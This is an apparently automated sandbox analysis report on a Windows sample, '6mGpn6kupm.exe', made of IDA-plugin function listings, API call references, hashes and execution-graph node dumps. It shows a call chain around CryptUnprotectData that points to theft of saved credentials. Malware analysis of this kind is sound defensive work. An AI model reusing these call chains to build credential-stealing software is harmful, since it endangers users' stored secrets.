                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 2659869361-2145255484
                                                                                                              • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                              • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                              • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                              • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                              APIs
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405D76
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405E1E
                                                                                                              • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0), ref: 00405E2E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                              • String ID: 0_B
                                                                                                              • API String ID: 3248276644-2128305573
                                                                                                              • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                              • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 004059E4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                              • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,774D2EE0,00403A1A,774D3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 1100898210-2145255484
                                                                                                              • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                              • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                              • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                              • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\6mGpn6kupm.exe,C:\Users\user\Desktop\6mGpn6kupm.exe,80000000,00000003), ref: 00405D0F
                                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\6mGpn6kupm.exe,C:\Users\user\Desktop\6mGpn6kupm.exe,80000000,00000003), ref: 00405D1F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharPrevlstrlen
                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                              • API String ID: 2709904686-3080008178
                                                                                                              • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                              • Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
                                                                                                              • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                              • Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 701C116A
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701C11C7
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701C11D9
                                                                                                              • GlobalFree.KERNEL32(?), ref: 701C1203
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1749930895.00000000701C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701C0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1749380141.00000000701C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1749974424.00000000701C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1750054487.00000000701C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701c0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1780285237-0
                                                                                                              • Opcode ID: e5722fe885f7154cf7c225136fa8d9129c5acf79a9e04cc9d849368358761d0a
                                                                                                              • Instruction ID: f0113cbc914a2a90d6f4a586520847266d2947fb0898bc18b3b001a0d357c175
                                                                                                              • Opcode Fuzzy Hash: e5722fe885f7154cf7c225136fa8d9129c5acf79a9e04cc9d849368358761d0a
                                                                                                              • Instruction Fuzzy Hash: 1B31A0B65802019FD3009F75CD55B3F7BF8EB66310B264529FA42D7B24EB38D85187A1
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                              • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:11.8%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:2.2%
                                                                                                              Total number of Nodes:277
                                                                                                              Total number of Limit Nodes:17
                                                                                                              execution_graph 45036 ad030 45037 ad048 45036->45037 45038 ad0a2 45037->45038 45044 37fb03f8 45037->45044 45047 37fb02c8 45037->45047 45052 37fb02b7 45037->45052 45057 37fb1bc0 45037->45057 45062 37fb1bd0 45037->45062 45045 37fb0407 45044->45045 45067 37fb0841 45044->45067 45045->45038 45048 37fb02ee 45047->45048 45050 37fb1bd0 3 API calls 45048->45050 45051 37fb1bc0 3 API calls 45048->45051 45049 37fb030f 45049->45038 45050->45049 45051->45049 45053 37fb02ee 45052->45053 45055 37fb1bd0 3 API calls 45053->45055 45056 37fb1bc0 3 API calls 45053->45056 45054 37fb030f 45054->45038 45055->45054 45056->45054 45058 37fb1bd0 45057->45058 45059 37fb1c2f 45058->45059 45115 37fb1d58 45058->45115 45125 37fb1d48 45058->45125 45063 37fb1bfd 45062->45063 45064 37fb1c2f 45063->45064 45065 37fb1d58 3 API calls 45063->45065 45066 37fb1d48 3 API calls 45063->45066 45065->45064 45066->45064 45070 37fb0856 45067->45070 45071 37fb0938 45067->45071 45076 37fb0928 45067->45076 45070->45045 45072 37fb0948 45071->45072 45073 37fb0965 45072->45073 45081 37fb0980 45072->45081 45093 37fb0970 45072->45093 45073->45070 45077 37fb0948 45076->45077 45078 37fb0965 45077->45078 45079 37fb0980 6 API calls 45077->45079 45080 37fb0970 6 API calls 45077->45080 45078->45070 45079->45078 45080->45078 45082 37fb09c6 GetCurrentProcess 45081->45082 45084 37fb0a18 GetCurrentThread 45082->45084 45086 37fb0a11 45082->45086 45085 37fb0a55 GetCurrentProcess 45084->45085 45088 37fb0a4e 45084->45088 45087 37fb0a8b 45085->45087 45086->45084 45105 37fb0b4f 45087->45105 45109 37fb0f31 45087->45109 45088->45085 45089 37fb0ab3 GetCurrentThreadId 45090 37fb0ae4 45089->45090 45090->45073 45094 37fb09c6 GetCurrentProcess 45093->45094 45096 37fb0a18 GetCurrentThread 45094->45096 45097 37fb0a11 45094->45097 45098 37fb0a4e 45096->45098 45099 37fb0a55 GetCurrentProcess 45096->45099 45097->45096 45098->45099 45101 37fb0a8b 45099->45101 45100 37fb0ab3 GetCurrentThreadId 45102 37fb0ae4 45100->45102 45103 37fb0b4f 2 API calls 45101->45103 45104 37fb0f31 45101->45104 45102->45073 45103->45100 45104->45100 45111 37fb0bc8 DuplicateHandle 45105->45111 45113 37fb0bc0 DuplicateHandle 45105->45113 45106 37fb0b8e 45106->45089 45110 37fb0f4e 45109->45110 45110->45089 45112 37fb0c5e 45111->45112 45112->45106 45114 37fb0c5e 45113->45114 45114->45106 45116 37fb1d93 45115->45116 45117 37fb1d66 45115->45117 45116->45117 45119 37fb1d98 45116->45119 45118 37fb1d6e 45117->45118 45139 37fb1dc0 45117->45139 45143 37fb1db1 45117->45143 45118->45059 45135 37fb17d0 45119->45135 45121 37fb1da4 45121->45059 45122 37fb1dac 45122->45059 45126 37fb1d58 45125->45126 45127 37fb1d66 45126->45127 45128 37fb1d98 45126->45128 45132 37fb1d6e 45127->45132 45133 37fb1db1 CallWindowProcW 45127->45133 45134 37fb1dc0 CallWindowProcW 45127->45134 45129 37fb17d0 GetCurrentThreadId 45128->45129 45130 37fb1da4 45129->45130 45130->45059 45131 37fb1dac 45131->45059 45132->45059 45133->45131 45134->45131 45136 37fb17db 45135->45136 45147 37fb181c 45136->45147 45138 37fb22f5 45138->45121 45140 37fb1e02 45139->45140 45142 37fb1e09 45139->45142 45141 37fb1e5a CallWindowProcW 45140->45141 45140->45142 45141->45142 45142->45122 45144 37fb1dc0 45143->45144 45145 37fb1e5a CallWindowProcW 45144->45145 45146 37fb1e09 45144->45146 45145->45146 45146->45122 45148 37fb1827 45147->45148 45149 37fb2461 GetCurrentThreadId 45148->45149 45150 37fb248b 45148->45150 45149->45150 45150->45138 45151 37fb20c0 45154 37fb20d6 45151->45154 45152 37fb213c 45152->45152 45154->45152 45155 37fb17fc 45154->45155 45156 37fb1807 45155->45156 45157 37fb17d0 GetCurrentThreadId 45156->45157 45158 37fb229c 45157->45158 45162 37a8ec19 45158->45162 45166 37a895e8 45158->45166 45159 37fb22a5 45159->45152 45163 37a8ec3a 45162->45163 45165 37a8ec47 45162->45165 45163->45165 45170 37a8e7f4 45163->45170 45165->45159 45167 37a895f3 45166->45167 45168 37a8e7f4 2 API calls 45167->45168 45169 37a8ec47 45167->45169 45168->45169 45169->45159 45172 37a8e7ff 45170->45172 45171 37a8f111 45171->45165 45172->45171 45175 37a8fab0 45172->45175 45180 37a8faa1 45172->45180 45176 37a8fadb 45175->45176 45177 37a8fb8a 45176->45177 45185 37fb00c0 45176->45185 45189 37fb0006 45176->45189 45181 37a8fab0 45180->45181 45182 37a8fb8a 45181->45182 45183 37fb00c0 2 API calls 45181->45183 45184 37fb0006 2 API calls 45181->45184 45182->45182 45183->45182 45184->45182 45193 37fb0110 45185->45193 45197 37fb0104 45185->45197 45190 37fb00f5 45189->45190 45191 37fb0110 CreateWindowExW 45189->45191 45192 37fb0104 CreateWindowExW 45189->45192 45190->45177 45191->45190 45192->45190 45194 37fb0178 CreateWindowExW 45193->45194 45196 37fb0234 45194->45196 45196->45196 45198 37fb0178 CreateWindowExW 45197->45198 45200 37fb0234 45198->45200 45201 37fb2020 SetTimer 45202 37fb208c 45201->45202 45203 15b158 45204 15b174 45203->45204 45213 34ca0188 45204->45213 45217 34ca0198 45204->45217 45205 15b1a3 45221 37a8bd48 45205->45221 45214 34ca0198 45213->45214 45237 34cac638 45214->45237 45215 34ca01da 45215->45205 45218 34ca01a4 45217->45218 45220 34cac638 CryptUnprotectData 45218->45220 45219 34ca01da 45219->45205 45220->45219 45222 37a8bd54 45221->45222 45263 37a8bd98 45222->45263 45225 37fb2730 45226 37fb273f 45225->45226 45227 37fb0938 10 API calls 45226->45227 45228 37fb2746 45227->45228 45293 37fb188c 45228->45293 45231 37fb2720 45232 37fb273f 45231->45232 45233 37fb0938 10 API calls 45232->45233 45234 37fb2746 45233->45234 45235 37fb188c 14 API calls 45234->45235 45236 15b1b1 45235->45236 45239 34cac631 45237->45239 45238 34cacaf9 45238->45215 45239->45237 45239->45238 45241 34cacf01 45239->45241 45242 34cacf10 45241->45242 45246 34cad540 45242->45246 45253 34cad550 45242->45253 45243 34cacf80 45243->45239 45247 34cad575 45246->45247 45248 34cad629 45246->45248 45247->45248 45251 34cad540 CryptUnprotectData 45247->45251 45252 34cad550 CryptUnprotectData 45247->45252 45260 34cad1ec 45248->45260 45251->45248 45252->45248 45254 34cad575 45253->45254 45255 34cad629 45253->45255 45254->45255 45258 34cad540 CryptUnprotectData 45254->45258 45259 34cad550 CryptUnprotectData 45254->45259 45256 34cad1ec CryptUnprotectData 45255->45256 45257 34cad7f5 45256->45257 45257->45243 45258->45255 45259->45255 45261 34cad9e0 CryptUnprotectData 45260->45261 45262 34cad7f5 45261->45262 45262->45243 45264 37a8bdb4 45263->45264 45268 37a8ce60 45264->45268 45272 37a8ce50 45264->45272 45265 15b1aa 45265->45225 45265->45231 45269 37a8ce7c 45268->45269 45276 37a894b4 45269->45276 45271 37a8ce9b 45271->45265 45273 37a8ce60 45272->45273 45274 37a894b4 2 API calls 45273->45274 45275 37a8ce9b 45274->45275 45275->45265 45277 37a894bf 45276->45277 45278 37a8cf4f 45277->45278 45281 37a8cf30 45277->45281 45289 37a8cf68 45277->45289 45278->45271 45282 37a8cf3f 45281->45282 45285 37a8cf56 45281->45285 45283 37a8cf4f 45282->45283 45287 37a8cf68 2 API calls 45282->45287 45288 37a8cf30 2 API calls 45282->45288 45283->45278 45284 37a8d021 45284->45284 45285->45284 45286 37a895e8 2 API calls 45285->45286 45286->45284 45287->45283 45288->45283 45291 37a8cf96 45289->45291 45290 37a8d021 45290->45290 45291->45290 45292 37a895e8 2 API calls 45291->45292 45292->45290 45295 37fb1897 45293->45295 45296 37fb2866 45295->45296 45297 37fb1934 45295->45297 45303 37fb193f 45297->45303 45298 37fb2e79 45299 37fb2ea9 45298->45299 45301 37fb2ac4 11 API calls 45298->45301 45304 37fb2ed4 45299->45304 45319 37fb2ac4 45299->45319 45301->45299 45302 37fb2ec1 45325 37fbd604 45302->45325 45331 37fbd608 45302->45331 45303->45298 45303->45304 45309 37fb3e33 45303->45309 45314 37fb3e40 45303->45314 45304->45295 45310 37fb3e61 45309->45310 45311 37fb3e85 45310->45311 45337 37fb3ff0 45310->45337 45343 37fb3fe0 45310->45343 45311->45298 45315 37fb3e61 45314->45315 45316 37fb3e85 45315->45316 45317 37fb3ff0 12 API calls 45315->45317 45318 37fb3fe0 12 API calls 45315->45318 45316->45298 45317->45316 45318->45316 45320 37fb2acf 45319->45320 45321 37fb0938 10 API calls 45320->45321 45324 37fbd0a1 45320->45324 45322 37fbd0bb 45321->45322 45376 37fbc544 45322->45376 45324->45302 45326 37fbd66d 45325->45326 45327 37fbd899 45326->45327 45329 37fbd6ba 45326->45329 45383 37fbc60c 45326->45383 45328 37fb0938 10 API calls 45327->45328 45328->45329 45329->45304 45336 37fbd66d 45331->45336 45332 37fbd899 45333 37fb0938 10 API calls 45332->45333 45334 37fbd6ba 45333->45334 45334->45304 45335 37fbc60c DispatchMessageW 45335->45336 45336->45332 45336->45334 45336->45335 45340 37fb3ffd 45337->45340 45338 37fb0938 10 API calls 45339 37fb402b 45338->45339 45341 37fb4036 45339->45341 45349 37fb2bec 45339->45349 45340->45338 45341->45311 45346 37fb3ffd 45343->45346 45344 37fb0938 10 API calls 45345 37fb402b 45344->45345 45347 37fb4036 45345->45347 45348 37fb2bec 12 API calls 45345->45348 45346->45344 45347->45311 45348->45347 45350 37fb2bf7 45349->45350 45352 37fb40a8 45350->45352 45353 37fb2c20 45350->45353 45352->45352 45354 37fb2c2b 45353->45354 45360 37fb2c30 45354->45360 45356 37fb4517 45364 37fb91f0 45356->45364 45370 37fb91d8 45356->45370 45357 37fb4551 45357->45352 45363 37fb2c3b 45360->45363 45361 37fb57a0 45361->45356 45362 37fb3e40 12 API calls 45362->45361 45363->45361 45363->45362 45366 37fb9221 45364->45366 45367 37fb9321 45364->45367 45365 37fb922d 45365->45357 45366->45365 45368 37a8fab0 2 API calls 45366->45368 45369 37a8faa1 2 API calls 45366->45369 45367->45357 45368->45367 45369->45367 45372 37fb9321 45370->45372 45373 37fb9221 45370->45373 45371 37fb922d 45371->45357 45372->45357 45373->45371 45374 37a8fab0 2 API calls 45373->45374 45375 37a8faa1 2 API calls 45373->45375 45374->45372 45375->45372 45378 37fbc54f 45376->45378 45377 37fbd3bb 45377->45324 45378->45377 45380 37fbc560 45378->45380 45381 37fbd3f0 OleInitialize 45380->45381 45382 37fbd454 45381->45382 45382->45377 45384 37fbe6d0 DispatchMessageW 45383->45384 45385 37fbe73c 45384->45385 45385->45326

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 482 37fbe790-37fbe7bb 483 37fbe7bd 482->483 484 37fbe7c2-37fbe822 482->484 483->484 486 37fbe828-37fbe939 484->486 487 37fbeb55-37fbeb7d 484->487 529 37fbe93b-37fbe947 486->529 530 37fbe963 486->530 490 37fbf308-37fbf330 487->490 491 37fbeb83-37fbebb0 487->491 497 37fbf5c9 490->497 498 37fbf336-37fbf50d 490->498 495 37fbeeae-37fbf219 491->495 496 37fbebb6-37fbedba 491->496 642 37fbf21b-37fbf230 495->642 643 37fbf232-37fbf243 495->643 598 37fbedbc-37fbedd1 496->598 599 37fbedd3-37fbede4 496->599 500 37fbf5ca-37fbf5d1 497->500 656 37fbf513 call 15324d 498->656 657 37fbf513 call 153168 498->657 535 37fbe949-37fbe94f 529->535 536 37fbe951-37fbe957 529->536 532 37fbe969-37fbeb0b 530->532 610 37fbeb1a 532->610 611 37fbeb0d-37fbeb19 532->611 537 37fbe961 535->537 536->537 537->532 605 37fbede5-37fbeea9 598->605 599->605 601 37fbf518-37fbf597 call 37a8cc28 624 37fbf59c-37fbf59e 601->624 634 37fbf307 605->634 610->487 611->610 624->500 634->490 646 37fbf244-37fbf306 642->646 643->646 646->634 656->601 657->601
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2572038939.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37fb0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: p1q
                                                                                                              • API String ID: 0-2041350651
                                                                                                              • Opcode ID: 5fac89d7753fa5bb83b2fde3686a07c6e5c66e96cb9bbbb4fe2051c02d355dea
                                                                                                              • Instruction ID: 5c38421f627d8f2b1999559de4a4170dad1e26653d278cd44dd91a90ba8eb42f
                                                                                                              • Opcode Fuzzy Hash: 5fac89d7753fa5bb83b2fde3686a07c6e5c66e96cb9bbbb4fe2051c02d355dea
                                                                                                              • Instruction Fuzzy Hash: 7282B274A00228CFDB25DF64D894BA9B7B2FB89301F5085E9D80A77760DB319E82CF54

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 659 37a8bdf0-37a8be10 660 37a8be12 659->660 661 37a8be17-37a8be77 659->661 660->661 663 37a8c1aa-37a8c1d2 661->663 664 37a8be7d-37a8bf8e 661->664 667 37a8c1d8-37a8c1ff 663->667 668 37a8c959-37a8c981 663->668 706 37a8bfb8 664->706 707 37a8bf90-37a8bf9c 664->707 674 37a8c4fe-37a8c86a 667->674 675 37a8c205-37a8c40a 667->675 672 37a8cc10 668->672 673 37a8c987-37a8cb62 668->673 677 37a8cc11-37a8cc17 672->677 834 37a8cb68 call 15324d 673->834 835 37a8cb68 call 153168 673->835 820 37a8c86c-37a8c881 674->820 821 37a8c883-37a8c894 674->821 775 37a8c40c-37a8c421 675->775 776 37a8c423-37a8c434 675->776 713 37a8bfbe-37a8c160 706->713 711 37a8bf9e-37a8bfa4 707->711 712 37a8bfa6-37a8bfac 707->712 714 37a8bfb6 711->714 712->714 788 37a8c16f-37a8c170 713->788 789 37a8c162-37a8c16e 713->789 714->713 782 37a8c435-37a8c4f9 775->782 776->782 777 37a8cb6d-37a8cbdd call 37a8cc28 801 37a8cbe3-37a8cbe5 777->801 812 37a8c958 782->812 788->663 789->788 801->677 812->668 824 37a8c895-37a8c957 820->824 821->824 824->812 834->777 835->777
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
